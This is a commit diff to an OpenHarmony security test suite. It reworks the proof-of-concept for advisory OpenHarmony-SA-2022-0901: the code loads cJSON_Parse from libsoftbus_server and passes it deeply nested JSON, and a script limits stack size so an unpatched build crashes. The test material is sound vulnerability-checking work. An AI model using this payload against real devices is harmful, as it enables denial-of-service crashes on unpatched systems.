提交OpenHarmony-SA-2022-0901动态测试用例

Signed-off-by: Njingyu123412 <1565704822@qq.com>

demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.c → demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.cpp

@@ -13,12 +13,44 @@
  * See the License for the specific language governing permissions and
  * limitations under the License.
  */
-// 编译时需要使用-l参数链接cjson共享库
 #include <stdio.h>
-#include <cjson/cJSON.h>
+#include <dlfcn.h>
+//#include <memory>
+#include <stdio.h>
+#include <unistd.h>
+
+/* The cJSON structure: */
+typedef struct cJSON
+{
+	struct cJSON *next;
+	struct cJSON *prev;
+	struct cJSON *child;
+	int type;
+	char *valuestring;
+	int valueint;
+	double valuedouble;
+	char *string;
+} cJSON;
 
 int main()
 {
+	void *handle;
+	// 打开共享库libsoftbus_server.z.so
+	handle = dlopen("/system/lib/libsoftbus_server.z.so", RTLD_LAZY);
+	if (!handle)
+	{
+		fprintf(stderr, "Error: %s\n", dlerror());
+		return 1;
+	}
+
+	// 获取函数DisplayManager::GetInstance地址
+    typedef cJSON* (*Func)(char*);
+    Func cJSON_Parse = reinterpret_cast<Func>(dlsym(handle, "cJSON_Parse"));
+    if (cJSON_Parse == NULL) {
+        fprintf(stderr, "Error: %s\n", dlerror());
+        dlclose(handle);
+        return 1;
+    }
 
 	// 准备一个具有900层嵌套结构的json数据
 	char *json_string = "{\"a\":[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]}";
@@ -32,7 +64,8 @@ int main()
 	}
 	// 返回值不为null，没有修复漏洞，应该收到signal 11段错误提示
 	printf("OpenHarmony-SA-2022-0901 : vulnerable\n");
-	cJSON_Delete(root);
+	//cJSON_Delete(root);
 
 	return 0;
 }
+

demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.sh

@@ -19,8 +19,5 @@
 #或者也可以继续增加嵌套的层数，使栈溢出，每增加一层会多占用64B的栈空间
 ulimit -s 60
 
-#设置LD_LIBARAY_PATH环境变量，指向cJSON的共享库文件存储位置
-export LD_LIBRARY_PATH=/data/local/tmp
-
 #运行poc可执行程序
 ./poc